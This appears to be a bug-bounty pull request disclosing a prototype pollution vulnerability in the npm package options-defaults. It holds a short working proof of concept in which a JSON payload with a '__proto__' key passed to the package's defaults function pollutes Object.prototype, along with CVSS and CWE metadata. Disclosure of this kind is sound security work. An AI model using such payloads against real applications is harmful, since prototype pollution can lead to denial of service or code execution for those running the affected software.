### PR TITLE
Prototype Pollution in options-defaults

### DIFF
--- a/bounties/npm/options-defaults/1/README.md
+++ b/bounties/npm/options-defaults/1/README.md
@@ -1,0 +1,32 @@
+# Description
+
+`options-defaults` is vulnerable to `Prototype Pollution`.
+This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.
+
+
+# Proof of Concept
+
+1. Create the following PoC file:
+
+```js
+// poc.js
+var optionsDefaults = require("options-defaults")
+const payload = JSON.parse('{"__proto__":{"polluted":"Yes! Its Polluted"}}');
+var obj = {}
+console.log("Before : " + {}.polluted);
+optionsDefaults.defaults(obj, payload);
+console.log("After : " + {}.polluted);
+```
+
+2. Execute the following commands in another terminal:
+
+```bash
+npm i options-defaults # Install affected module
+node poc.js #  Run the PoC
+```
+
+3. Check the Output:
+```
+Before : undefined
+After : Yes! Its Polluted
+```

--- a/bounties/npm/options-defaults/1/vulnerability.json
+++ b/bounties/npm/options-defaults/1/vulnerability.json
@@ -1,0 +1,55 @@
+{
+    "PackageVulnerabilityID": "1",
+    "DisclosureDate": "2020-11-19",
+    "AffectedVersionRange": "*",
+    "Summary": "Prototype Pollution",
+    "Contributor": {
+        "Discloser": "",
+        "Fixer": ""
+    },
+    "Package": {
+        "Registry": "npm",
+        "Name": "options-defaults",
+        "URL": "https://www.npmjs.com/package/options-defaults",
+        "Downloads": "198(1,866/month)"
+    },
+    "CWEs": [
+        {
+            "ID": "471",
+            "Description": "Modification of Assumed-Immutable Data (MAID)"
+        }
+    ],
+    "CVSS":
+    {
+        "Version": "3.1",
+        "AV": "N",
+        "AC": "L",
+        "PR": "N",
+        "UI": "N",
+        "S": "U",
+        "C": "L",
+        "I": "L",
+        "A": "L",
+        "E": "",
+        "RL": "",
+        "RC": "",
+        "Score": "5.6"
+    },
+    "CVEs": [
+        ""
+    ],
+    "Repository": {
+        "URL": "https://github.com/radarsu/options-defaults",
+        "Codebase": [
+            "TypeScript"
+        ],
+        "Owner": "radarsu",
+        "Name": "options-defaults",
+        "Forks": 0,
+        "Stars": 1
+    },
+    "Permalinks": [
+        ""
+    ],
+    "References": []
+}

--- a/bounties/npm/options-defaults/1/vulnerability.json
+++ b/bounties/npm/options-defaults/1/vulnerability.json
@@ -51,5 +51,6 @@
     "Permalinks": [
         ""
     ],
-    "References": []
+    "References": [],
+    "PrNumber": "1231"
 }


### PR DESCRIPTION
`options-defaults` is vulnerable to `Prototype Pollution`.
This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.